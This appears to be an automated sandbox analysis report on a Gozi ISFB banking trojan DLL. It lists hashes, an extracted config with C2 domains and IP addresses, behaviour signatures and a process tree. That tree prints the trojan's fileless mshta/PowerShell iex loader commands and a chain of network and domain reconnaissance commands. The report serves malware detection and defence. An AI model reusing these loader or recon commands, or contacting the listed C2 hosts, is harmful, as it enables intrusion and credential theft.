Analysis

  • max time kernel
    151s
  • max time network
    138s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220721-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20220721-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    03-08-2022 16:02

General

  • Target

    aa856dedda137f7419ecc36766ed74e3.dll

  • Size

    300KB

  • MD5

    aa856dedda137f7419ecc36766ed74e3

  • SHA1

    59a685b1ddd500747678ed66ffdb1afadb7b8023

  • SHA256

    9ec85fa9097826fce61020be2f15ed01c320109c7ec3654c2a42b1b5c46b4b6f

  • SHA512

    60dcb99e96369c32fc8330570021225575b01c3e7b4ecd42554d0b5dbca2796cdb86f93630b32c836892b67a3b50ff8b7594cff43d02a85f8822beb638011fff

Malware Config

Extracted

Family

gozi_ifsb

Botnet

3000

C2

config.edge.skype.com

37.120.206.71

37.120.206.84

193.106.191.163

Attributes
  • base_path

    /drew/

  • build

    250240

  • exe_type

    loader

  • extension

    .jlk

  • server_id

    50

rsa_pubkey.plain
aes.plain

Extracted

Family

gozi_ifsb

Botnet

3000

C2

37.120.206.91

37.120.206.95

havefuntxmm.at

5.42.199.57

xerkdeoleone.at

Attributes
  • base_path

    /images/

  • build

    250240

  • exe_type

    worker

  • extension

    .jlk

  • server_id

    50

rsa_pubkey.plain
aes.plain

Signatures

  • Gozi, Gozi IFSB

    Gozi ISFB is a well-known and widely distributed banking trojan.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Discovers systems in the same network 1 TTPs 3 IoCs
  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Modifies registry class 64 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 50 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:3576
  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
      PID:3828
    • C:\Windows\Explorer.EXE
      C:\Windows\Explorer.EXE
      1⤵
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3116
      • C:\Windows\system32\regsvr32.exe
        regsvr32 /s C:\Users\Admin\AppData\Local\Temp\aa856dedda137f7419ecc36766ed74e3.dll
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3256
        • C:\Windows\SysWOW64\regsvr32.exe
          /s C:\Users\Admin\AppData\Local\Temp\aa856dedda137f7419ecc36766ed74e3.dll
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:4540
      • C:\Windows\System32\mshta.exe
        "C:\Windows\System32\mshta.exe" "about:<hta:application><script>Lp3h='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Lp3h).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\8A2718CF-61F1-4CDB-3B5E-25409F722974\\\ManagerMemory'));if(!window.flag)close()</script>"
        2⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:2952
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name muwvla -value gp; new-alias -name pimbks -value iex; pimbks ([System.Text.Encoding]::ASCII.GetString((muwvla "HKCU:Software\AppDataLow\Software\Microsoft\8A2718CF-61F1-4CDB-3B5E-25409F722974").ProcessOptions))
          3⤵
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4380
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xr5mce2s\xr5mce2s.cmdline"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:864
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES256A.tmp" "c:\Users\Admin\AppData\Local\Temp\xr5mce2s\CSC1396718FD4E48259285D1476762AD99.TMP"
              5⤵
                PID:3588
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\accmwzpw\accmwzpw.cmdline"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:3228
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2683.tmp" "c:\Users\Admin\AppData\Local\Temp\accmwzpw\CSCFFAEDFB65E064C8FA99B587AB452037.TMP"
                5⤵
                  PID:4068
      • C:\Windows\system32\cmd.exe
        cmd /C "wmic computersystem get domain |more > C:\Users\Admin\AppData\Local\Temp\343A.bin1"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4244
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic computersystem get domain
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4188
        • C:\Windows\system32\more.com
          more
          3⤵
            PID:2148
      • C:\Windows\syswow64\cmd.exe
        "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
        2⤵
          PID:1740
      • C:\Windows\system32\cmd.exe
        cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"
        2⤵
          PID:4344
      • C:\Windows\system32\cmd.exe
        cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\343A.bin1"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4208
        • C:\Windows\system32\systeminfo.exe
          systeminfo.exe
          3⤵
          • Gathers system information
          PID:3816
      • C:\Windows\system32\cmd.exe
        cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"
        2⤵
          PID:1092
      • C:\Windows\system32\cmd.exe
        cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:832
        • C:\Windows\system32\net.exe
          net view
          3⤵
          • Discovers systems in the same network
          PID:2152
      • C:\Windows\system32\cmd.exe
        cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"
        2⤵
          PID:4600
      • C:\Windows\system32\cmd.exe
        cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:556
        • C:\Windows\system32\nslookup.exe
          nslookup 127.0.0.1
          3⤵
            PID:2708
      • C:\Windows\system32\cmd.exe
        cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"
        2⤵
          PID:5052
      • C:\Windows\system32\cmd.exe
        cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4296
        • C:\Windows\system32\tasklist.exe
          tasklist.exe /SVC
          3⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:3224
      • C:\Windows\system32\cmd.exe
        cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"
        2⤵
          PID:2916
      • C:\Windows\system32\cmd.exe
        cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"
        2⤵
          PID:4680
        • C:\Windows\system32\driverquery.exe
          driverquery.exe
          3⤵
            PID:864
      • C:\Windows\system32\cmd.exe
        cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"
        2⤵
          PID:4068
      • C:\Windows\system32\cmd.exe
        cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"
        2⤵
          PID:4928
        • C:\Windows\system32\reg.exe
          reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
          3⤵
            PID:2092
      • C:\Windows\system32\cmd.exe
        cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"
        2⤵
          PID:4836
      • C:\Windows\system32\cmd.exe
        cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"
        2⤵
          PID:3196
        • C:\Windows\system32\net.exe
          net config workstation
          3⤵
            PID:2788
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 config workstation
            4⤵
              PID:4040
      • C:\Windows\system32\cmd.exe
        cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"
        2⤵
          PID:4324
      • C:\Windows\system32\cmd.exe
        cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"
        2⤵
          PID:1668
        • C:\Windows\system32\nltest.exe
          nltest /domain_trusts
          3⤵
            PID:3996
      • C:\Windows\system32\cmd.exe
        cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"
        2⤵
          PID:4348
      • C:\Windows\system32\cmd.exe
        cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"
        2⤵
          PID:4564
        • C:\Windows\system32\nltest.exe
          nltest /domain_trusts /all_trusts
          3⤵
            PID:4860
      • C:\Windows\system32\cmd.exe
        cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"
        2⤵
          PID:1856
      • C:\Windows\system32\cmd.exe
        cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"
        2⤵
          PID:2688
        • C:\Windows\system32\net.exe
          net view /all /domain
          3⤵
          • Discovers systems in the same network
          PID:1220
      • C:\Windows\system32\cmd.exe
        cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"
        2⤵
          PID:2424
      • C:\Windows\system32\cmd.exe
        cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"
        2⤵
          PID:2196
        • C:\Windows\system32\net.exe
          net view /all
          3⤵
          • Discovers systems in the same network
          PID:824
      • C:\Windows\system32\cmd.exe
        cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\343A.bin1"
        2⤵
          PID:4396
      • C:\Windows\system32\cmd.exe
        cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\343A.bin1 > C:\Users\Admin\AppData\Local\Temp\343A.bin & del C:\Users\Admin\AppData\Local\Temp\343A.bin1"
        2⤵
          PID:3776
  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
    • Modifies registry class
    PID:4552

Network

MITRE ATT&CK Enterprise v6

Downloads

                                                                  • C:\Users\Admin\AppData\Local\Temp\343A.bin

                                                                    Filesize

                                                                    65KB

                                                                    MD5

                                                                    2be250533505ac5c4e288f7281b6bfc4

                                                                    SHA1

                                                                    d88f1fc0e989584cf390a02a676b58d9c3d5acbb

                                                                    SHA256

                                                                    f6b33d6635d0bb5bc9d9b004ab8e9938823edb4093653cd0deb4c8e16e6c4b65

                                                                    SHA512

                                                                    37725511d4340a4e30c452f37b1a8e58ee4c5f22e4aa6b77b5c6ea1b2daf9ae42582bb2db33f20f94ee767bcd014456a8bdf0bdd7fdb54f13b9f7d93ec87e1b8

                                                                  • C:\Users\Admin\AppData\Local\Temp\343A.bin1

                                                                    Filesize

                                                                    44B

                                                                    MD5

                                                                    f7aea2435aa888b709ca20f816c33bfd

                                                                    SHA1

                                                                    38717c9a73b5f8bd399839cbe0aa57518427e758

                                                                    SHA256

                                                                    f0c30a157e0a0ea84b114c2b66a66d444a3824c2bfe7829d929b40e6548fa5d5

                                                                    SHA512

                                                                    1ea828fc1932c97f5ba5f6ebf05f2816d4d89f003b094f2d0868d54f52b53774437037e2c8837e97b820d5f2e5d5707825b048a9ab2af261af00810f01bd8232

                                                                  • C:\Users\Admin\AppData\Local\Temp\343A.bin1

                                                                    MD5

                                                                    d41d8cd98f00b204e9800998ecf8427e

                                                                    SHA1

                                                                    da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                    SHA256

                                                                    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                    SHA512

                                                                    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                  • C:\Users\Admin\AppData\Local\Temp\343A.bin1

                                                                    Filesize

                                                                    2KB

                                                                    MD5

                                                                    92f52356fda8a51244df2c14828bd930

                                                                    SHA1

                                                                    335bedf66b420029da09eca8d9ed22cae93fdd64

                                                                    SHA256

                                                                    ba0aeb1efb309fe38822f7bb479a4ba9e8558b6a02a4129a21a9a960b81f0b69

                                                                    SHA512

                                                                    dbe7d8d2c0779995437e8c51e7b431593aa2678450da30b9cc97e527e2142f585d486b2c3056b210e4e2c84bd2a1d03588089a189ff29150b20b99c17744ad79

                                                                  • C:\Users\Admin\AppData\Local\Temp\343A.bin1

                                                                    Filesize

                                                                    2KB

                                                                    MD5

                                                                    7266e6c1b7501456d74c5ac4bcaf2352

                                                                    SHA1

                                                                    1aee2a2a73cb5371e126e907eeed12f2ce11e0a3

                                                                    SHA256

                                                                    dc0fb0044edd0389e9993b3c925f55309a38653131bf53fcb18dc9d93d8d6ac1

                                                                    SHA512

                                                                    4dc00e2a88e1b483ddc879e6da6adee83890f3691cd9842bfaf8d48eec0171361f2adccc24773bc2cabe58f9e70debdffc0730043be073c18d9ff9e4a2fb5f7b

                                                                  • C:\Users\Admin\AppData\Local\Temp\343A.bin1

                                                                    Filesize

                                                                    2KB

                                                                    MD5

                                                                    837de7e11db720fff66b7f7181271c0f

                                                                    SHA1

                                                                    856a8ae5bde24ce4b8f0c27b62222e355165c4b8

                                                                    SHA256

                                                                    249ec97ae002bdfea9b65ba8e1e0644db23ba5e0a2f312659446ac53c71bb852

                                                                    SHA512

                                                                    17ea0edf2b4342310c28e097eaf4a4df31bee807d2a75c196d5f299a060dfa17e152e6f03cc23262fdea3e413bc12412dab62cd563b16d1210dc9e07b7f6e04e

                                                                  • C:\Users\Admin\AppData\Local\Temp\343A.bin1

                                                                    Filesize

                                                                    2KB

                                                                    MD5

                                                                    a270d63c9c2ce75338beadd46651e418

                                                                    SHA1

                                                                    78d67614545c3bfa349fb671d45a0cce2ae134b7

                                                                    SHA256

                                                                    1a606937fdabcc8d148b3319e8f515f0d204e0d4380045daf93f55967b3cfebc

                                                                    SHA512

                                                                    e44bb6aedc4fa8c87e1d654ae0aaf33618a5867c99dfaa8f40a64c6217bdbe554faa6aa804785aa706cf40f19f9291feb2af40ab283c6990da1d7b8c64a5de99

                                                                  • C:\Users\Admin\AppData\Local\Temp\343A.bin1

                                                                    Filesize

                                                                    9KB

                                                                    MD5

                                                                    3459e1fc227fcaa6fad8dc2e10d84fd2

                                                                    SHA1

                                                                    bb30b7d6ee1d2d258dbeee48b1a824d12209fbe9

                                                                    SHA256

                                                                    11dab6c92b5a465fd9f6c2ef2edec77a5831f20cdca9534c2c34aadddf48924d

                                                                    SHA512

                                                                    ff974d3aaf6597ad517f407ee3c09180152e0bf392130a803b3bb842caef5344217600825418b9c473ecc4e387c34b8d4f00c08c0f7804c0fae726bb3b9d6d03

                                                                  • C:\Users\Admin\AppData\Local\Temp\343A.bin1

                                                                    Filesize

                                                                    35KB

                                                                    MD5

                                                                    1368e996c316498973c786ace3f42f87

                                                                    SHA1

                                                                    8d7f1dbe9e9dbf02aace07ed320b47a7b7a01d0a

                                                                    SHA256

                                                                    b4b662d4b823e3af2af59f02ce0f6653fa92c6e27d1146cc225d9fc6524b1acc

                                                                    SHA512

                                                                    60a31c4247e4ea9aab62b69dcdf4c80bc72a259950bd47d930dbdb51ac6b52cad4620ba62ee08e4f639bb52ab50beb580039ac6674fd4c368c73882d217ded9b

                                                                  • C:\Users\Admin\AppData\Local\Temp\343A.bin1

                                                                    Filesize

                                                                    64KB

                                                                    MD5

                                                                    02fdc24f3a1c19cfa74983fae1cf014a

                                                                    SHA1

                                                                    6d7eaa6f24f588343b7d69cf2f1ec9e6d2295462

                                                                    SHA256

                                                                    0eb080f7a289e78baf814518fc45c408c00f7a2f69af9c217e04d5476ea5c400

                                                                    SHA512

                                                                    d44444ff9e85e1c3c308f09cff5c7e94795df544df186e5c5cf80b02ce318726820ff5c2642f9951816de9d9af2aa91c0e5edbac03d66a3fc3bee687084e61ea

                                                                  • C:\Users\Admin\AppData\Local\Temp\343A.bin1

                                                                    Filesize

                                                                    65KB

                                                                    MD5

                                                                    1474718875d6962a725dd676ecc738c6

                                                                    SHA1

                                                                    7a63d76d07df9e7088b290a8d13250e1e5ddd490

                                                                    SHA256

                                                                    8fee96446f545c3c25c84e48d89385f5a6dda65c2c31b674b83ba1ef9fd3169d

                                                                    SHA512

                                                                    cfcb35a7a043c40155ef99c8822f3447e1b6a602bfed159208a77b1c91cc46b27ca074338f08e8a90edf852dc38cd2113dda0fce882ea44dfbab84d3fbe1d51a

                                                                  • C:\Users\Admin\AppData\Local\Temp\343A.bin1

                                                                    Filesize

                                                                    65KB

                                                                    MD5

                                                                    1474718875d6962a725dd676ecc738c6

                                                                    SHA1

                                                                    7a63d76d07df9e7088b290a8d13250e1e5ddd490

                                                                    SHA256

                                                                    8fee96446f545c3c25c84e48d89385f5a6dda65c2c31b674b83ba1ef9fd3169d

                                                                    SHA512

                                                                    cfcb35a7a043c40155ef99c8822f3447e1b6a602bfed159208a77b1c91cc46b27ca074338f08e8a90edf852dc38cd2113dda0fce882ea44dfbab84d3fbe1d51a

                                                                  • C:\Users\Admin\AppData\Local\Temp\343A.bin1

                                                                    Filesize

                                                                    65KB

                                                                    MD5

                                                                    d012fdba3c4261fd829d348c7c79ab1c

                                                                    SHA1

                                                                    c62597b41f59102ada4bbfb159887416e4e11db9

                                                                    SHA256

                                                                    eadaa711062014ba34ba6a2beb9552a73f6d31bcc688f47103c764ca3a53875a

                                                                    SHA512

                                                                    78d5b06eb4045545fe9f18590baf7c82e10a37404a1ab546c915ea1be4a8a2add9d67e9c9c266b708edd74e59cbf3e4c0d6954ae828ccd4cdde910f7ca425495

                                                                  • C:\Users\Admin\AppData\Local\Temp\343A.bin1

                                                                    Filesize

                                                                    65KB

                                                                    MD5

                                                                    37144bba0fcf98f8105431732787e0b8

                                                                    SHA1

                                                                    a5c353555e6eae1fdee6580cf84f81dcc6e344f9

                                                                    SHA256

                                                                    7b5815a1087b942c9e0cde5d481023b238a6a88df54764d89aeba97c7a9936c7

                                                                    SHA512

                                                                    8e97b9f4a2e7f45eac8f27ae5a669b7deceab17d81b7dcafc25d9c51ab8cecd1c0693c52da16c866312a4593bf8e7fdcd2abaf012fd3dbec63a55c0da0437cf8

                                                                  • C:\Users\Admin\AppData\Local\Temp\343A.bin1

                                                                    Filesize

                                                                    65KB

                                                                    MD5

                                                                    b5b5e79eb35ffaf034e96932062abb70

                                                                    SHA1

                                                                    ccdf90bd4e989879eff01ea7f6f8247548575228

                                                                    SHA256

                                                                    75d3a33521051412c7f2a50ec7e19f596f0971bb8bbd8df6c6a2f657c8e5921a

                                                                    SHA512

                                                                    4fddabf2148762d84f6f9edd7b28738b7082f46af5d9b4cf9d9e5408d09aaddb5dfa76bf04f192e67a8ff5e87915d11f330a911654ad0b5109374372d686dfad

                                                                  • C:\Users\Admin\AppData\Local\Temp\343A.bin1

                                                                    Filesize

                                                                    65KB

                                                                    MD5

                                                                    2be250533505ac5c4e288f7281b6bfc4

                                                                    SHA1

                                                                    d88f1fc0e989584cf390a02a676b58d9c3d5acbb

                                                                    SHA256

                                                                    f6b33d6635d0bb5bc9d9b004ab8e9938823edb4093653cd0deb4c8e16e6c4b65

                                                                    SHA512

                                                                    37725511d4340a4e30c452f37b1a8e58ee4c5f22e4aa6b77b5c6ea1b2daf9ae42582bb2db33f20f94ee767bcd014456a8bdf0bdd7fdb54f13b9f7d93ec87e1b8

                                                                  • C:\Users\Admin\AppData\Local\Temp\RES256A.tmp

                                                                    Filesize

                                                                    1KB

                                                                    MD5

                                                                    c61bb66419dd65cf5ad9f747f26d4db4

                                                                    SHA1

                                                                    1837614b7a0b5f461fe28b2ba755e535a21c2996

                                                                    SHA256

                                                                    f3f58e80271e86370440a5851d1b4edea44b5eea4a4e758452bee2f850bbb0ae

                                                                    SHA512

                                                                    af87507594158784b4bdcb549b50376120e5b8e4e756267752bd6b3750ba773424bec60870058becfe74ec13fa38043ee26846afe90944b018b538b9dfe268b3

                                                                  • C:\Users\Admin\AppData\Local\Temp\RES2683.tmp

                                                                    Filesize

                                                                    1KB

                                                                    MD5

                                                                    4c9e24c8ad5b4da6b1ffc13bce37b3c7

                                                                    SHA1

                                                                    71e51eb055b3a43666eba00d6f16d67534ee6c77

                                                                    SHA256

                                                                    b9682cfee63e97bbef9a43d5029d79b8e69c4a1667b48e852ffe9d3778167175

                                                                    SHA512

                                                                    69b2885d5ab9258310ee707de32d57e5ffe962ead72df23732ad532048437bf4972faa0148176970b60a5d86027add8f253dd610203d86b19aa1dedacb9e0df0

                                                                  • C:\Users\Admin\AppData\Local\Temp\accmwzpw\accmwzpw.dll

                                                                    Filesize

                                                                    3KB

                                                                    MD5

                                                                    f39620c5773a3b2aa5d5befdd2c31124

                                                                    SHA1

                                                                    0aeab41edec2c360b2438dcdf95e3830a9149aef

                                                                    SHA256

                                                                    be17263265fd35655c213e23f29959df22b6d5357b54c435b66a9047459c9322

                                                                    SHA512

                                                                    ff6e19217b79b841da43888b40b8df924c889c04311a3b20176417a2e0dfe6f8709ac242eeb0f9044f5cc87218233663b55c1fa619d384e3f1bc0f309c1a31c3

                                                                  • C:\Users\Admin\AppData\Local\Temp\xr5mce2s\xr5mce2s.dll

                                                                    Filesize

                                                                    3KB

                                                                    MD5

                                                                    bcb55518005d3f22cc8b6f9c1f9462b1

                                                                    SHA1

                                                                    b853cc5e1f68fa59e272197923c92cd2e2e69405

                                                                    SHA256

                                                                    e3b73c85f38115f41b56be783d4452b0932c026b535cefd6562d8737c190cba9

                                                                    SHA512

                                                                    5732aa781fe02d9e2f09a50d962a0a932d325ea3fc86f31cdfe6a937ac1bb88bb5c364142f849d7e6b82db7e2ed520b1bf9f81d6887407c7fd5f9f4d8215bc32

                                                                  • \??\c:\Users\Admin\AppData\Local\Temp\accmwzpw\CSCFFAEDFB65E064C8FA99B587AB452037.TMP

                                                                    Filesize

                                                                    652B

                                                                    MD5

                                                                    c1acc698bdec8241f5b0e61fa805b79c

                                                                    SHA1

                                                                    4cc0b5f5f6413d4ccca23fd8584239ffac44b881

                                                                    SHA256

                                                                    eae014f0f50d027fbf549bc41ce9e0c674488c1c8fee8120034e6343807dff60

                                                                    SHA512

                                                                    3448bfdc44384fecc3fe056c3e9b79d76eb52605634414a2a2327eed62056416687e341e075a3ed7334d666edb2c990835aa2641c7a07978ebf83d0fc9b5b53c

                                                                  • \??\c:\Users\Admin\AppData\Local\Temp\accmwzpw\accmwzpw.0.cs

                                                                    Filesize

                                                                    400B

                                                                    MD5

                                                                    aca9704199c51fde14b8bf8165bc2a4c

                                                                    SHA1

                                                                    789b408ccad29240bd093515cbd19a199ad2c1c8

                                                                    SHA256

                                                                    cb3da8a9768252634f8ed4c62e026dc8217b055e00f11b6012a52ed130c92c27

                                                                    SHA512

                                                                    a8c1df598581f508ecbf1e516744f11abfb71ec6bb9895d0b61f15e70e56e27cb40b4e5395b9411b787f8bb4f264ca704d815260677909dc1e599d601d0b5de6

                                                                  • \??\c:\Users\Admin\AppData\Local\Temp\accmwzpw\accmwzpw.cmdline

                                                                    Filesize

                                                                    369B

                                                                    MD5

                                                                    beba16e59f02318fd5747b8d7be8ec2f

                                                                    SHA1

                                                                    5c9a49f37d0f4e296364c45358c9e51be664e9cc

                                                                    SHA256

                                                                    ed4a7645909f7cda9edce8a4f3d75bdde28f2ab0e314c71390207c00918c1271

                                                                    SHA512

                                                                    f65cdbd3ba37ff1860bc5531ff815a2859b93c52a64b47e7215d3926b3fbedbbbf3077efbab028dbcefb52cc6da85d3097b293c714893635d280fb0a7834fd9e

                                                                  • \??\c:\Users\Admin\AppData\Local\Temp\xr5mce2s\CSC1396718FD4E48259285D1476762AD99.TMP

                                                                    Filesize

                                                                    652B

                                                                    MD5

                                                                    76bd946bba0aaa6c3953f08a7a52873c

                                                                    SHA1

                                                                    de1d778b2548b3a67fc6b430ca286a5ae07d3020

                                                                    SHA256

                                                                    0c535950015294e9f36f037b13c76d45f7aa6cf7319b52718c4323e7b5d55641

                                                                    SHA512

                                                                    0ce5d8ef4686b7273301cdfcc2229a0bcd00a996d3172e3c4032de042f4fad6b9d76515dcf7ad74236d7e248fdf9c043d39b776551db7ad3515a0613884c9787

                                                                  • \??\c:\Users\Admin\AppData\Local\Temp\xr5mce2s\xr5mce2s.0.cs

                                                                    Filesize

                                                                    410B

                                                                    MD5

                                                                    9a10482acb9e6952b96f4efc24d9d783

                                                                    SHA1

                                                                    5cfc9bf668351df25fcda98c3c2d0bb056c026c3

                                                                    SHA256

                                                                    a0424e1530f002761a882c19c22504153a5e86d7fbb41391e940452bfa15f377

                                                                    SHA512

                                                                    e932914ad99d7bd39561e020d1e8c1f4e175c16eae66df720100c65e40ccc3383b5145f703432885f3f1ce080e8a4feb045ddd5c8bbc2f3231c619d04182ac28

                                                                  • \??\c:\Users\Admin\AppData\Local\Temp\xr5mce2s\xr5mce2s.cmdline

                                                                    Filesize

                                                                    369B

                                                                    MD5

                                                                    e2bc0cd94a1905450fe7c4665accfbe0

                                                                    SHA1

                                                                    5a71da3c6bea5105bb934594b7f0bf41f31bd30f

                                                                    SHA256

                                                                    5b67365b0f494a631fcd9560ff30c6e793cec9ad9553762c9c5761e998aa94c9

                                                                    SHA512

                                                                    759d5cd8f05fac682d45f5ed8141bd2a4a441d5b4cf2f09afed20cb3f6d9a7fdbff3e628307cceaa47ef124a499d9f3d616130bd3354d238b0d7b9b66dca7a26

                                                                  • memory/556-189-0x0000000000000000-mapping.dmp

                                                                  • memory/824-229-0x0000000000000000-mapping.dmp

                                                                  • memory/832-184-0x0000000000000000-mapping.dmp

                                                                  • memory/864-143-0x0000000000000000-mapping.dmp

                                                                  • memory/864-201-0x0000000000000000-mapping.dmp

                                                                  • memory/1092-182-0x0000000000000000-mapping.dmp

                                                                  • memory/1220-225-0x0000000000000000-mapping.dmp

                                                                  • memory/1668-215-0x0000000000000000-mapping.dmp

                                                                  • memory/1740-165-0x0000000000786B20-0x0000000000786B24-memory.dmp

                                                                    Filesize

                                                                    4B

                                                                  • memory/1740-162-0x0000000000000000-mapping.dmp

                                                                  • memory/1740-166-0x0000000000C70000-0x0000000000D06000-memory.dmp

                                                                    Filesize

                                                                    600KB

                                                                  • memory/1856-222-0x0000000000000000-mapping.dmp

                                                                  • memory/2092-206-0x0000000000000000-mapping.dmp

                                                                  • memory/2148-164-0x0000000000000000-mapping.dmp

                                                                  • memory/2152-186-0x0000000000000000-mapping.dmp

                                                                  • memory/2196-227-0x0000000000000000-mapping.dmp

                                                                  • memory/2424-226-0x0000000000000000-mapping.dmp

                                                                  • memory/2688-223-0x0000000000000000-mapping.dmp

                                                                  • memory/2708-191-0x0000000000000000-mapping.dmp

                                                                  • memory/2788-211-0x0000000000000000-mapping.dmp

                                                                  • memory/2916-197-0x0000000000000000-mapping.dmp

                                                                  • memory/3116-187-0x0000000008120000-0x00000000081C3000-memory.dmp

                                                                    Filesize

                                                                    652KB

                                                                  • memory/3116-160-0x0000000008120000-0x00000000081C3000-memory.dmp

                                                                    Filesize

                                                                    652KB

                                                                  • memory/3116-174-0x000000000D260000-0x000000000D39B000-memory.dmp

                                                                    Filesize

                                                                    1.2MB

                                                                  • memory/3116-178-0x000000000D3A0000-0x000000000D4DA000-memory.dmp

                                                                    Filesize

                                                                    1.2MB

                                                                  • memory/3196-209-0x0000000000000000-mapping.dmp

                                                                  • memory/3224-196-0x0000000000000000-mapping.dmp

                                                                  • memory/3228-150-0x0000000000000000-mapping.dmp

                                                                  • memory/3576-159-0x00000183FD920000-0x00000183FD9C3000-memory.dmp

                                                                    Filesize

                                                                    652KB

                                                                  • memory/3588-146-0x0000000000000000-mapping.dmp

                                                                  • memory/3776-231-0x0000000000000000-mapping.dmp

                                                                  • memory/3816-171-0x0000000000000000-mapping.dmp

                                                                  • memory/3828-172-0x0000017AAEB30000-0x0000017AAEBD3000-memory.dmp

                                                                    Filesize

                                                                    652KB

                                                                  • memory/3996-217-0x0000000000000000-mapping.dmp

                                                                  • memory/4040-212-0x0000000000000000-mapping.dmp

